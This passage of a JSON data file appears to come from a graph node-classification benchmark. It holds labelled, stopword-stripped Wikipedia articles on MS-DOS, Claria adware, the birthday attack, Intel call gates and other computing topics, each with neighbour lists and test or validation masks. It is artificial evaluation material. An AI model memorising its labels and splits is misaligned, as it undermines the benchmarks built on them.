maintenance security metrics security evaluation criteria evaluation methodologies tests test methods security-specific criteria laboratory accreditation guidance use evaluated tested products research address assurance methods system-wide security assessment methodologies security protocol validation activities appropriate coordination assessment-related activities voluntary industry standards bodies assessment regimes march 22 2019 united states secretary commerce wilbur ross approved fips 140-3 security requirements cryptographic modules succeed fips 140-2 according announcement fips 140-3 become effective september 22 2019 validated cryptographic module validation program cmvp fips 140-3 testing begin september 22 2020 fips 140-3 testing begins fips 140-2 testing continue least year making two standards coexist time",
    "neighbors": [
      8674,
      420,
      11432,
      1941,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9166,
    "label": 2,
    "text": "MS-DOS:ms-dos ms-dos acronym microsoft disk operating system operating system x86-based personal computers mostly developed microsoft collectively ms-dos rebranding ibm pc dos operating systems attempting compatible ms-dos sometimes referred dos also generic acronym disk operating system ms-dos main operating system ibm pc compatible personal computers 1980s early 1990s gradually superseded operating systems offering graphical user interface gui various generations graphical microsoft windows operating system ibm licensed re-released august 12 1981 pc dos 1.0 use pcs although ms-dos pc dos initially developed parallel microsoft ibm two products diverged twelve years 1993 recognizable differences compatibility syntax capabilities lifetime several competing products released x86 platform ms-dos went eight versions development ceased 2000 initially ms-dos targeted intel 8086 processors running computer hardware using floppy disks store access operating system application software user data well progressive version releases delivered support mass storage media ever greater sizes formats along added feature support newer processors rapidly evolving computer architectures ultimately key product microsoft growth programming language company diverse software development firm providing company essential revenue marketing resources also underlying basic operating system early versions windows ran gui flexible operating system consumes negligible installation space ms-dos renamed form 86-dos owned seattle computer products written tim paterson development 86-dos took six weeks basically clone digital research cp/m 8080/z80 processors ported run 8086 processors two notable differences compared cp/m improved disk sector buffering logic introduction fat12 instead cp/m filesystem first version shipped august 1980 microsoft needed operating system ibm personal computer hired tim paterson may 1981 bought 86-dos 1.10 75,000 july year microsoft kept version number renamed ms-dos also licensed ms-dos 1.10/1.14 ibm august 1981 offered pc dos 1.0 one three operating systems ibm 5150 ibm pc within year microsoft licensed ms-dos 70 companies designed os could run 8086-family computer computer would distinct hardware version ms-dos similar situation existed cp/m ms-dos emulating solution cp/m adapt different hardware platforms end ms-dos designed modular structure internal device drivers minimally primary disk drives console integrated kernel loaded boot loader installable device drivers devices loaded integrated boot time oem would use development kit provided microsoft build version ms-dos basic i/o drivers standard microsoft kernel would typically supply disk end users along hardware thus many different versions ms-dos different hardware major distinction ibm-compatible isa machine ms-dos compatible machine machines like tandy 2000 ms-dos compatible ibm-compatible could run software written exclusively ms-dos without dependence peripheral hardware ibm pc architecture design would worked well compatibility application programs used ms-dos services perform device i/o indeed design philosophy embodied windows nt see hardware abstraction layer however ms-dos early days greater speed attainable programs direct control hardware particular importance especially games often pushed limits contemporary hardware soon ibm-compatible architecture became goal long 8086-family computers closely emulated ibm hardware single version ms-dos fixed hardware platform needed market version version ms-dos discussed dozens oem versions ms-dos relevant systems designed case similar function capability standard version ibm pc—often same-numbered version always since oems used proprietary version numbering schemes e.g labeling later releases ms-dos 1.x 2.0 vice versa —with notable exceptions microsoft omitted multi-user support ms-dos microsoft unix-based operating system xenix fully multi-user company planned time improve ms-dos would almost indistinguishable single-user xenix xedos would also run motorola 68000 zilog z8000 lsi-11 would upwardly compatible xenix byte 1983 described multi-user ms-dos future microsoft advertised ms-dos xenix together listing shared features single-user os multi-user multi-tasking unix-derived operating system promising easy porting breakup bell system however computer systems started selling unix system v. believing could compete unix market microsoft abandoned xenix 1987 transferred ownership xenix santa cruz operation sco march 25 2014 microsoft made code scp ms-dos 1.25 mixture altos ms-dos 2.11 televideo pc dos 2.11 available public microsoft research license agreement makes code source-available open source defined open source initiative free software foundation standards microsoft would later re-license code mit license september 28 2018 making versions free software april fool day joke 2015 microsoft mobile launched windows phone application called ms-dos mobile presented new mobile operating system worked similar ms-dos microsoft licensed released versions ms-dos different names like lifeboat associates software bus 86 a.k.a sb-dos compaq-dos ncr-dos z-dos eventually enforced ms-dos name versions ibm one originally called ibm personal computer dos later shortened ibm pc dos competitors released compatible dos systems dr dos pts-dos could also run dos applications former eastern bloc ms-dos derivatives named dcp 3.20 3.30 existed late 1980s produced east german electronics manufacturer veb robotron following versions ms-dos released public microsoft dos released oem channel digital research released dr dos 5.0 retail upgrade pc dos 5.00.1 ibm-microsoft agreement started end ibm entered retail dos market ibm dos 5.00.1 5.02 6.00 pc dos 6.1 6.3 7 2000 7.1 localized versions ms-dos existed different markets western issues ms-dos evolved around set tools drivers localized message languages differing sets supported codepages keyboard layouts language versions considerably different western issues adapted run localized pc hardware additional bios services available western pcs support multiple hardware codepages displays printers support dbcs alternative input methods graphics output affected issues include japanese dos/v korean arabic ados 3.3/5.0 hebrew hdos 3.3/5.0 russian rdos 4.01/5.0 well eastern european versions dos microcomputers based intel 8086 8088 processors including ibm pc clones initial competition pc dos/ms-dos line came digital research whose cp/m operating system inspired ms-dos fact remains controversy whether qdos less plagiarised early versions cp/m code digital research released cp/m-86 months ms-dos offered alternative ms-dos microsoft licensing requirements higher price executable programs cp/m-86 ms-dos interchangeable many applications sold ms-dos cp/m-86 versions ms-dos became preponderant later digital research operating systems could run ms-dos cp/m-86 software ms-dos originally supported simple .com modelled similar binary incompatible format known cp/m-80 cp/m-86 instead supported relocatable format using file extension .cmd avoid name conflicts cp/m-80 ms-dos .com files ms-dos version 1.0 added advanced relocatable .exe executable file format machines early days ms-dos differing system architectures certain degree incompatibility subsequently vendor lock-in users began using ms-dos machines compelled continue using version customized hardware face trying get proprietary hardware software work new system business world 808x-based machines ms-dos tied faced competition unix operating system ran many different hardware architectures microsoft sold version unix pc called xenix emerging world home users variety computers based various processors serious competition ibm pc apple ii early apple macintosh commodore 64 others use 808x processor many 808x machines different architectures used custom versions ms-dos first machines competition time ibm pc hardware configuration became dominant 808x market software written communicate directly pc hardware without using standard operating system calls ran much faster true pc-compatibles non-pc-compatible 808x machines small market fast software written alone market remained open ibm pcs machines closely imitated architecture running either single version ms-dos compatible pcs equivalent ibm pc dos clones cost much less ibm-branded machines similar performance became widely used home users ibm pcs large share business computer market microsoft ibm together began intended follow-on ms-dos/pc dos called os/2 os/2 released 1987 microsoft began advertising campaign announcing dos dead stating version 4 last full release os/2 designed efficient multi-tasking standard operating systems since 1963 offered number advanced features designed together similar look feel seen legitimate heir kludgy dos platform ms-dos grown spurts many significant features taken duplicated microsoft products operating systems ms-dos also grew incorporating direct licensing feature duplicating functionality tools utilities developed independent companies norton utilities pc tools microsoft anti-virus qemm expanded memory manager stacker disk compression others period digital research competing operating system market computers like amstrad pc1512 sold floppy disks two operating systems one could used time ms-dos cp/m-86 derivative digital research produced dos plus compatible ms-dos 2.11 supported cp/m-86 programs additional features including multi-tasking could read write disks cp/m ms-dos format os/2 protracted development digital research released ms-dos compatible dr dos 5.0 included features available third-party add-ons ms-dos unwilling lose portion market microsoft responded announcing pending release ms-dos 5.0 may 1990 effectively killed dr dos sales actual release ms-dos 5.0 june 1991 digital research brought dr dos 6.0 sold well pre-announcement ms-dos 6.0 stifled sales dr dos microsoft accused carefully orchestrating leaks future versions ms-dos attempt create industry called fud fear uncertainty doubt regarding dr dos example october 1990 shortly release dr dos 5.0 long eventual june 1991 release ms-dos 5.0 stories feature enhancements ms-dos started appear infoworld pc week brad silverberg vice president systems software microsoft general manager windows ms-dos business unit wrote forceful letter pc week november 5 1990 denying microsoft engaged fud tactics serve customers better decided forthcoming version 5.0 denying microsoft copied features dr dos feature enhancements ms-dos version 5.0 decided development begun long heard dr dos 5.0 similar features 50 million ms-dos users n't surprising dri heard requests customers – schulman et al 1994 pact microsoft ibm promote os/2 began fall apart 1990 windows 3.0 became marketplace success much microsoft contributions os/2 also went creating third gui replacement dos windows nt ibm already developing next version os/2 carried development platform without microsoft sold alternative dos windows response digital research dr dos 6.0 bundled superstor disk compression microsoft opened negotiations stac electronics vendor popular dos disk compression tool stacker due diligence process stac engineers shown microsoft part stacker source code stac unwilling meet microsoft terms licensing stacker withdrew negotiations microsoft chose license vertisoft doubledisk using core doublespace disk compression ms-dos 6.0 6.20 released 1993 including microsoft doublespace disk compression utility program stac successfully sued microsoft patent infringement regarding compression algorithm used doublespace resulted 1994 release ms-dos 6.21 disk compression removed shortly afterwards came version 6.22 new version disk compression system drivespace different compression algorithm avoid infringing code prior 1995 microsoft licensed ms-dos windows computer manufacturers three types agreement per-processor fee system company sold per-system fee system particular model per-copy fee copy ms-dos installed largest manufacturers used per-processor arrangement lowest fee arrangement made expensive large manufacturers migrate operating system dr dos 1991 u.s. government federal trade commission began investigating microsoft licensing procedures resulting 1994 settlement agreement limiting microsoft per-copy licensing digital research gain settlement years later successor interest caldera sued microsoft damages caldera v. microsoft lawsuit believed settlement ran order 150 million revealed november 2009 release settlement agreement 280 million microsoft also used variety tactics ms-dos several applications development tools operating perfectly running genuine ms-dos pc dos would break run another vendor implementation dos notable examples practice included introduction windows 3.0 1990 easy usability graphical user interface severely diminished usage ms-dos based command line release windows 95 continuing windows 9x product line windows integrated version ms-dos used bootstrapping troubleshooting backwards-compatibility old dos software particularly games longer released standalone product windows 95 dos called ms-dos 7 booted separately without windows gui capability retained windows 98 second edition windows removed capability boot underlying ms-dos 8.0 alone hard disk retained ability make dos boot floppy disk called emergency boot disk hacked restore full access underlying dos contrast windows 9x series windows nt-derived 32-bit operating systems developed alongside 9x series windows nt 2000 xp newer contain ms-dos part operating system nt built subsystem running dos entirely different independent operating system provide subset dos emulation run dos applications provide dos-like command prompt windows 64-bit versions windows nt line provide dos emulation run dos applications natively windows xp contains copy windows boot disk stripped bootstrap accessible formatting floppy ms-dos startup disk files like driver cd-rom support deleted windows bootdisk startup files autoexec.bat config.sys longer content modified disk base creating ms-dos image windows xp deleted files recovered undelete tool booting ms-dos startup disk made windows xp format tool version reports windows millenium ms-dos 8.0 used base windows 98 never released stand alone product windows vista files startup disk dated april 18 2005 otherwise unchanged including string ms-dos version 8 copyright 1981–1999 microsoft corp inside codice_1 starting windows 10 ability create dos startup disk removed either virtual machine running ms-dos older version virtual machine dual boot must used format floppy disk image must obtained external source solutions include using dos compatible alternatives freedos even copying required files boot sector ms-dos 6.22 last standalone version produced microsoft intel 8088 intel 8086 intel 80286 processors remain available download via msdn volume license oem license partner websites customers valid login credentials ms-dos still used embedded x86 systems due simple architecture minimal memory processor requirements though current products switched still-maintained open-source alternative freedos 2018 microsoft released source code ms-dos 1.25 2.0 github purpose according microsoft mainly education experimentation historic operating systems new programmers gain understanding low-level software works historic current due historical nature software microsoft accept pull requests code pull requests modified translated documentation accepted users however allowed fully encouraged fork repository containing ms-dos source code make modifications whatever like versions ms-dos obtained operation modification abandonware sites winworldpc versions microsoft windows ms-dos-like command-line interface cli called command prompt could run many dos variously win32 os/2 1.x posix command line utilities command-line session allowing piping commands user interface icon windows 2000 followed native ms-dos interface 16-bit versions windows 3.11 ran graphical user interface gui top ms-dos windows 95 98 98 se ms-dos part superficially integrated treating operating systems complete package though dos component could actually stand alone command line accessed dos command line usually codice_1 windows module winoldap.mod new line windows windows nt boot kernel whose sole purpose load windows one run win32 applications loader system manner os/2 unix consumer windows launch character-mode sessions command session permits running various supported command line utilities win32 ms-dos os/2 1.x posix emulators ms-dos os/2 posix use host window way win16 applications use win32 explorer using host window allows one pipe output emulations ms-dos emulation done ntvdm nt virtual dos machine modified softpc former product similar virtualpc running modified ms-dos 5 ntio.sys ntdos.sys output handled console dlls program prompt codice_3 codice_4 codice_5 see output 64-bit windows either dos emulation dos commands come 32-bit windows dos version returns 5.00 5.50 depending api function used determine utilities ms-dos 5.00 run emulation without modification early beta programs nt show ms-dos 30.00 programs running ms-dos 30.00 would assume os/2 control os/2 emulation handled os2ss.exe os2.exe doscalls.dll os2.exe version os/2 shell cmd.exe passes commands os2ss.exe input-output windows nt shell windows 2000 last version nt support os/2 emulation os/2 1.30 posix emulated posix shell emulated shell commands handled directly cmd.exe command prompt often called ms-dos prompt part official name windows 9x early versions windows nt nt 3.5 earlier part softpc emulation dos redirects output actually codice_1 16-bit commands run ntvdm codice_7 codice_8 initialisation determined codice_9 optionally permitting use win32 console applications internal commands codice_10 directive win32 console applications use codice_3 command prompt shell confusion exist os/2 separate dos os/2 prompts running dos program os/2 launch separate dos window run application versions windows itanium longer sold microsoft x86-64 architectures longer include ntvdm therefore longer natively run ms-dos 16-bit windows applications alternatives form virtual machine emulators microsoft virtual pc well vmware dosbox others 1983 onwards various companies worked graphical user interfaces guis capable running pc hardware however required duplicated effort provide much consistency interface design even products company later 1985 microsoft windows 1.0 released microsoft first attempt providing consistent user interface applications early versions windows ran top ms-dos first windows met little success also true companies efforts well example gem version 3.0 windows gained market acceptance windows 9x used dos boot process launch protected mode basic features related file system long file names available dos running subsystem windows windows nt runs independently dos includes ntvdm component simulating dos environment legacy applications ms-dos compatible systems include microsoft manufactured ibm pc dos ibm ms-dos identical products eventually diverged starting ms-dos version 6.0 digital research follow microsoft version numbering scheme example ms-dos 4 released july 1988 followed dr dos 5.0 may 1990 ms-dos 5.0 came april 1991 dr dos 6.0 released following june products collectively referred dos even though disk operating system generic term used systems unrelated x86 ibm pc ms-dos also generic reference dos ibm pc compatible computers microsoft control windows platform programming practices intentionally made windows appear ran poorly competing versions dos crippled ability dos makers continue compete ms-dos digital research release interim releases circumvent windows limitations inserted artificially designed specifically provide microsoft competitive advantage",
    "neighbors": [
      10240,
      6148,
      2055,
      6153,
      10257,
      4115,
      25,
      10273,
      37,
      2096,
      8241,
      8243,
      4150,
      58,
      10306,
      8262,
      4170,
      10328,
      10333,
      95,
      97,
      10340,
      8298,
      8300,
      8301,
      2159,
      10352,
      2168,
      8315,
      4220,
      2179,
      4228,
      2193,
      10387,
      6296,
      2201,
      6321,
      178,
      8369,
      181,
      10424,
      8388,
      2249,
      204,
      4305,
      10449,
      8407,
      8410,
      8423,
      6378,
      4331,
      2289,
      2290,
      6390,
      10499,
      6405,
      6407,
      273,
      2322,
      4375,
      281,
      292,
      8485,
      2345,
      8494,
      8499,
      10552,
      4409,
      321,
      10561,
      6467,
      10564,
      8517,
      4423,
      2380,
      6476,
      8529,
      4441,
      8542,
      2399,
      10590,
      8551,
      6506,
      6521,
      8576,
      2432,
      6529,
      6535,
      394,
      8595,
      421,
      4527,
      10679,
      10688,
      10691,
      452,
      6596,
      10692,
      8650,
      2510,
      4563,
      4579,
      2534,
      10728,
      2545,
      499,
      10749,
      518,
      4614,
      8713,
      10768,
      6675,
      532,
      10776,
      537,
      8729,
      4637,
      4642,
      6697,
      10809,
      570,
      576,
      577,
      2625,
      4674,
      4690,
      10839,
      4699,
      2652,
      4706,
      10855,
      8809,
      2672,
      629,
      4727,
      639,
      640,
      4735,
      6787,
      10883,
      4741,
      8840,
      4748,
      6797,
      10894,
      10895,
      10899,
      2718,
      4766,
      6820,
      8876,
      6837,
      697,
      703,
      6859,
      4812,
      6867,
      6868,
      2776,
      10999,
      2811,
      11008,
      4870,
      6921,
      8976,
      787,
      8985,
      6939,
      2846,
      801,
      804,
      808,
      9006,
      823,
      4924,
      9026,
      11075,
      11076,
      9033,
      847,
      11096,
      861,
      11103,
      7015,
      4968,
      2921,
      9066,
      7019,
      2933,
      9077,
      894,
      2942,
      2943,
      5001,
      7057,
      5011,
      929,
      7088,
      9137,
      11184,
      2995,
      954,
      9151,
      5067,
      972,
      973,
      9166,
      11221,
      5080,
      11229,
      9194,
      5106,
      11251,
      9212,
      3069,
      5124,
      3091,
      7187,
      5158,
      7217,
      7243,
      11346,
      7269,
      5227,
      3180,
      11380,
      7285,
      9335,
      1147,
      1148,
      3197,
      1150,
      7314,
      9363,
      7317,
      9366,
      7325,
      11421,
      1183,
      3235,
      1193,
      9388,
      5293,
      3248,
      1202,
      11444,
      7356,
      11454,
      3268,
      7366,
      9417,
      3281,
      1237,
      7382,
      5340,
      3296,
      1253,
      9446,
      5356,
      5357,
      5359,
      1265,
      5363,
      3323,
      3325,
      3339,
      11539,
      5400,
      5406,
      1311,
      11550,
      11562,
      1324,
      1326,
      5425,
      7473,
      9525,
      7483,
      7486,
      7495,
      5457,
      11601,
      5459,
      11605,
      7515,
      9563,
      7523,
      3436,
      7538,
      5492,
      1405,
      1408,
      7554,
      1412,
      11657,
      3474,
      5523,
      11667,
      3477,
      5526,
      9627,
      3496,
      7603,
      9651,
      9652,
      7610,
      9658,
      9662,
      9673,
      9674,
      3536,
      5600,
      1509,
      9703,
      1515,
      5612,
      3571,
      5619,
      5628,
      7679,
      1535,
      1549,
      9743,
      3607,
      9756,
      1566,
      9762,
      7715,
      9773,
      9784,
      1599,
      1606,
      5702,
      7771,
      7773,
      9821,
      1632,
      7795,
      7804,
      9861,
      3722,
      7818,
      1684,
      9881,
      3738,
      1693,
      9887,
      7847,
      7849,
      9907,
      9910,
      1720,
      1721,
      3787,
      9932,
      5840,
      9936,
      1750,
      9946,
      9951,
      5858,
      7912,
      5873,
      7924,
      9978,
      5888,
      3841,
      7943,
      1804,
      1805,
      9996,
      1807,
      3856,
      3857,
      10016,
      7983,
      7986,
      1853,
      7999,
      10052,
      3915,
      1873,
      5982,
      10079,
      3939,
      3943,
      3953,
      8062,
      6016,
      1922,
      3970,
      10121,
      3978,
      3980,
      6030,
      8092,
      8098,
      1958,
      8115,
      6075,
      6078,
      10177,
      6082,
      8136,
      6090,
      4051,
      6112,
      8163,
      6118,
      6120,
      10217,
      6126,
      6128,
      6129,
      10235,
      2045,
      4094
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9167,
    "label": 5,
    "text": "Microsoft_Media_Server:microsoft media server microsoft media server mms microsoft proprietary network-streaming protocol serves transfer unicast data windows media services previously called netshow services mms transported via udp tcp mms default port udp/tcp 1755 microsoft deprecated mms favor rtsp tcp/udp port 554 2003 release windows media services 9 series continued support mms time interest backward compatibility support protocol finally dropped windows media services 2008 several years developers sdp multimedia download-tool reverse engineered mms protocol published unofficial documentation however microsoft finally released protocol specification february 2008",
    "neighbors": [
      10242,
      5251,
      5765,
      9609,
      6028,
      3086,
      3218,
      11413,
      790,
      6171,
      10269,
      10270,
      7713,
      35,
      9380,
      10026,
      10282,
      10924,
      6319,
      11060,
      10808,
      6330,
      4797,
      10173,
      7364,
      6993,
      6231,
      11223,
      2777,
      8281,
      603,
      1501,
      10727,
      11112,
      5482,
      4219,
      9834,
      9328,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 9168,
    "label": 4,
    "text": "Claria_Corporation:claria corporation claria corporation formerly gator corporation software company based redwood city california invented “ behavioral marketing ” highly effective controversial new form online advertising founded 1998 denis coleman co-founder symantec stanford mba sasha zorovic engineer mark pennell based work zorovic done stanford march 1999 jeff mcfadden hired ceo zorovic effectively forced name later used interchangeably gain advertising network claimed serviced 50 million users claria exited adware business end second quarter 2006 eventually shut completely october 2008 gator also known gain adserver products collected personal information unknowing users including websites visited portions credit card numbers target display ads computers web surfers billed leader online behavioral marketing company changed name claria corporation october 30 2003 effort better communicate expanding breadth offerings provide consumers advertisers according ceo president jeff mcfadden originally released 1999 gator frequently installed together programs offered free charge go zilla kazaa development programs partially funded revenue advertising displayed gator mid-2003 gator installed estimated 35 million pcs even though gator installed uninstall available via add/remove programs control panel microsoft windows many spyware removal tools also detect remove gator end user license agreement attempts disallow manual removal prohibiting unauthorized means uninstallation gator software undercut fundamental ad-supported nature many internet publishers replacing banner ads web sites thereby depriving content provider revenue necessary continue providing content june 2002 number large publishers including new york post new york times dow jones company sued gator software practice replacing ads lawsuits settled court february 2003 gator attempted combat spyware labels litigation september 2003 company threatened sites pc pitstop libel lawsuits part settlement signed sept. 30 2003 pc pitstop -- scans computers hostile otherwise undesirable code -- removed pages spyware information center titles gator spyware gator boycott list february 2004 gator made confidential settlement litigation brought seven top newspaper publishers including washington post new york post new york times dow jones washington post l.l bean extended stay america suits similarly settled gator corporation released suite free internet applications performed various tasks however installing applications user would continually shown ads gain network even programs running foreground suite included using software user shown advertisements according computer associates spyware information center applications suite classified adware spyware display ads unrelated product primary user interface visible programs employ user internet connection report behavior information back claria although user explicit consent always required install applications claria took advantage fact users choose bothering educate installing cases install process users must choose whether install free version serves lots ads described pay 30 version serves ads since announcement shut ad network claria stopped accepting payment ad free versions despite unpopular reputation claria corporation received backing major venture capital firms including greylock technology crossover ventures u.s. venture partners andy bechtolsheim early investor filed 150 million ipo april 2004 stating income 35 million revenues 90 million 2003 investors concerned practices might illegal least utah time another concern revenue came one partner yahoo overture claria withdrew filing august 2004 july 2005 microsoft corporation came fire revealed anti-spyware product would longer quarantine claria software spyware though still offered users option remove software microsoft reportedly contemplating purchase claria many consumers felt conflict interest spyware-reporting agencies computer associates panda software truprevent technologies still label claria products adware spyware march 2006 claria claimed would exiting adware business focusing personalized search technology july 1 2006 claria ceased displaying pop-up ads around time new company nebuad formed former claria employees another approach targeted advertisements april 21 2008 claria sold gator.com domain october 2008 rebranded jelly cloud company quietly shut today claria former senior management team occupy variety leadership roles throughout online marketing industry scott vandevelde claria last ceo former chief revenue officer chief revenue officer dotomi online advertising firm specializing personalized media scott eagle claria former chief operating officer chief marketing officer joined eharmony online dating company chief marketing officer former ceo jeff mcfadden vp business development zen marketing former vp business development mitchell weisman part leadership team lifestreet corporation largest ad network facebook tony martin claria former vp engineering ran engineering operations project playlist claria former vp engineering analytics dominic bennett claria senior director finance dennis jang part leadership team turn leading online advertising dsp vp engineering vp finance respectively co-founder former claria cto mark pennell senior software engineer apple 2016 claria core engineering team works apple",
    "neighbors": [
      704,
      9569,
      713,
      202,
      877,
      6797,
      10392,
      3163,
      3452,
      3485
    ],
    "mask": "Test"
  },
  {
    "node_id": 9169,
    "label": 7,
    "text": "Explicit_multi-threading:explicit multi-threading random-access machine ram abstract machine model used computer science study algorithms complexity standard serial computing pram computational model abstract parallel machine model introduced similarly study parallel algorithms complexity parallel computing yet built researchers developed large body knowledge parallel algorithms pram model parallel algorithms also known simple standards approaches parallel algorithms large body parallel algorithms knowledge pram model relative simplicity motivated building computers whose programming guided parallel algorithms since productivity parallel programmers long considered crucial success parallel computer simplicity algorithms important multi-core computers built around two processor cores integrated single integrated circuit die widely used across many application domains including general-purpose computing explicit multi-threading xmt computing paradigm building programming multi-core computers tens hundreds thousands processor cores experimental work published 2011 2012 demonstrates significantly greater speedups advanced pram algorithms xmt prototypes problems state-of-the-art multi-core computers work published 2018 shows lock-step parallel programming using ice achieve performance fastest hand-tuned multi-threaded code xmt systems inductive lock-step approach stands contrast multi-threaded programming approaches many core systems known challenging programmers xmt paradigm introduced uzi vishkin explicit multi-threading xmt computing paradigm integrates several levels abstraction work-time wt sometimes called work-depth framework introduced provides simple way conceptualizing describing parallel algorithms wt framework parallel algorithm first described terms parallel rounds round operations performed characterized several issues suppressed example number operations round need clear processors need mentioned information may help assignment processors jobs need accounted second suppressed information provided inclusion suppressed information fact guided proof scheduling theorem due wt framework useful since greatly simplify initial description parallel algorithm inserting details suppressed initial description often difficult example wt framework adopted basic presentation framework parallel algorithms books pram model well class notes explains simple connection wt framework rudimentary ice abstraction noted xmt paradigm programmed using xmtc parallel multi-threaded programming language small extension programming language c. xmt paradigm include programmer ’ workflow starts casting algorithm wt framework proceeds programming xmtc xmt multi-core computer systems provides run-time load-balancing multi-threaded programs incorporating several patents one generalizes program counter concept central von neumann architecture multi-core hardware january 2007 64-processor computer named paraleap demonstrates overall concept completed xmt concept presented xmt 64-processor computer since making parallel programming easy one biggest challenges facing computer science today demonstration also sought include teaching basics pram algorithms xmtc programming students ranging high-school graduate school experimental work reported maximum flow problem two papers graph connectivity connectivity graph theory graph biconnectivity biconnected graph graph triconnectivity triconnected component problems demonstrated advanced algorithms parallel algorithmic literature xmt paradigm offer 8 times 100 times greater speedups problems state-of-the-art multi-core computers reported speedup obtained comparing clock cycles xmt prototype relative fastest serial algorithm running fastest serial machines xmt prototyping culminated establishing lock-step parallel programming using ice achieve performance fastest hand-tuned multi-threaded code xmt systems 2018 result sharpens contrast xmt programming multi-threaded programming approaches employed nearly many-core systems whose race conditions demands tend challenge sometimes even fail programmers",
    "neighbors": [
      10102,
      9739,
      6950
    ],
    "mask": "Test"
  },
  {
    "node_id": 9170,
    "label": 4,
    "text": "Birthday_attack:birthday attack birthday attack type cryptographic attack exploits mathematics behind birthday problem probability theory attack used abuse communication two parties attack depends higher likelihood collisions found random attack attempts fixed degree permutations pigeonholes birthday attack possible find collision hash function formula_1 formula_2 classical preimage resistance security general though disputed result quantum computers perform birthday attacks thus breaking collision resistance formula_3 example consider scenario teacher class 30 students n 30 asks everybody birthday simplicity ignore leap years determine whether two students birthday corresponding hash collision described intuitively chance may seem small teacher picked specific day say 16 september chance least one student born specific day formula_4 7.9 however counter-intuitively probability least one student birthday student day around 70 n 30 formula formula_5 given function formula_6 goal attack find two different inputs formula_7 formula_8 pair formula_7 called collision method used find collision simply evaluate function formula_6 different input values may chosen randomly pseudorandomly result found birthday problem method rather efficient specifically function formula_11 yields formula_12 different outputs equal probability formula_12 sufficiently large expect obtain pair different arguments formula_14 formula_15 formula_8 evaluating function formula_17 different arguments average consider following experiment set h values choose n values uniformly random thereby allowing repetitions let p n h probability experiment least one value chosen probability approximated let n p h smallest number values choose probability finding collision least p inverting expression find following approximation assigning 0.5 probability collision arrive let q h expected number values choose finding first collision number approximated example 64-bit hash used approximately 1.8 × 10 different outputs equally probable best case would take 'only approximately 5 billion attempts 5.38 × 10 generate collision using brute force value called birthday bound n -bit codes could computed 2 examples follows easy see outputs function distributed unevenly collision could found even faster notion 'balance hash function quantifies resistance function birthday attacks exploiting uneven key distribution however determining balance hash function typically require possible inputs calculated thus infeasible popular hash functions md sha families subexpression formula_22 equation formula_23 computed accurately small formula_24 directly translated common programming languages codice_1 due loss significance codice_2 available c99 example equivalent expression codice_3 used instead done first column table computed zero several items second column even one correct significant digit python function accurately generate table math import log1p sqrt def birthday probability_exponent bits code saved file named codice_4 run interactively following example good rule thumb used mental calculation relation also written works well probabilities less equal 0.5 approximation scheme especially easy use working exponents instance suppose building 32-bit hashes formula_28 want chance collision one million formula_29 many documents could close correct answer 93 digital signatures susceptible birthday attack message formula_31 typically signed first computing formula_32 formula_6 cryptographic hash function using secret key sign formula_32 suppose mallory wants trick bob signing fraudulent contract mallory prepares fair contract formula_31 fraudulent one formula_36 finds number positions formula_31 changed without changing meaning inserting commas empty lines one versus two spaces sentence replacing synonyms etc combining changes create huge number variations formula_31 fair contracts similar manner mallory also creates huge number variations fraudulent contract formula_36 applies hash function variations finds version fair contract version fraudulent contract hash value formula_40 presents fair version bob signing bob signed mallory takes signature attaches fraudulent contract signature proves bob signed fraudulent contract probabilities differ slightly original birthday problem mallory gains nothing finding two fair two fraudulent contracts hash mallory strategy generate pairs one fair one fraudulent contract birthday problem equations apply formula_41 number pairs number hashes mallory actually generates formula_42 avoid attack output length hash function used signature scheme chosen large enough birthday attack becomes computationally infeasible i.e twice many bits needed prevent ordinary brute-force attack besides using larger bit length signer bob protect making random inoffensive changes document signing keeping copy contract signed possession least demonstrate court signature matches contract fraudulent one pollard rho algorithm logarithms example algorithm using birthday attack computation discrete logarithms",
    "neighbors": [
      8674,
      1315,
      7556,
      4389,
      262,
      2154,
      6954,
      8554,
      3984,
      8627,
      8628,
      2357,
      1941,
      3477,
      10806,
      6905,
      11639
    ],
    "mask": "None"
  },
  {
    "node_id": 9171,
    "label": 3,
    "text": "Call_gate_(Intel):call gate intel call gate mechanism intel x86 architecture changing privilege level process executes predefined function call using call far instruction call gates intended allow less privileged code call code higher privilege level type mechanism essential modern operating systems employ memory protection since allows user applications use kernel functions system calls way controlled operating system call gates use special selector value reference descriptor accessed via global descriptor table local descriptor table contains information needed call across privilege boundaries similar mechanism used interrupts assuming call gate set already operating system kernel code simply call far necessary segment selector offset field ignored processor perform number checks make sure entry valid code operating sufficient privilege use gate assuming checks pass new cs/eip loaded segment descriptor continuation information pushed onto stack new privilege level old ss old esp old cs old eip order parameters may also copied old stack new stack needed number parameters copy located call gate descriptor kernel may return user space program using ret far instruction pops continuation information stack returns outer privilege level os/2 early user call gates transfer application code running ring 3 privileged code running ring 2 kernel code ring 0 windows 95 executes drivers process switching ring 0 applications including api dll kernel32.dll krnl386.exe executed ring 3 driver vwin32.vxd provides key operating system primitives ring 0 allows calling driver functions 16-bit applications msdos win16 address obtained calling int 2fh 1684h ax register identify vxd entry point requested bx register set 16-bit vxd id upon return int instruction es.di registers contain far pointer called transfer control vxd running ring 0 descriptor pointed es actually call gate 32-bit applications however need access windows 95 driver code call undocumented vxdcall function kernel32.dll essentially calls int 30h changes ring mode modern x86 operating systems transitioning away call far call gates introduction x86 instructions system call sysenter/sysexit intel syscall/sysret amd new faster mechanism introduced control transfers x86 programs architectures support call gates use rare even new instructions software interrupts traps preferred portability even though call gates significantly faster interrupts call gates flexible sysenter/sysexit syscall/sysret instructions since unlike latter two call gates allow changing arbitrary privilege level arbitrary albeit higher equal privilege level fast sys* instructions allow control transfers ring 3 0 vice versa preserve system security global descriptor table must held protected memory otherwise program able create call gate use raise privilege level call gates used software security exploits ways found around protection one example e-mail worm gurong.a written exploit microsoft windows operating system uses \\device\\physicalmemory install call gate",
    "neighbors": [
      8551,
      6797,
      7983,
      3473,
      5457,
      5363,
      2041,
      2653,
      1247
    ],
    "mask": "Test"
  },
  {
    "node_id": 9172,
    "label": 9,
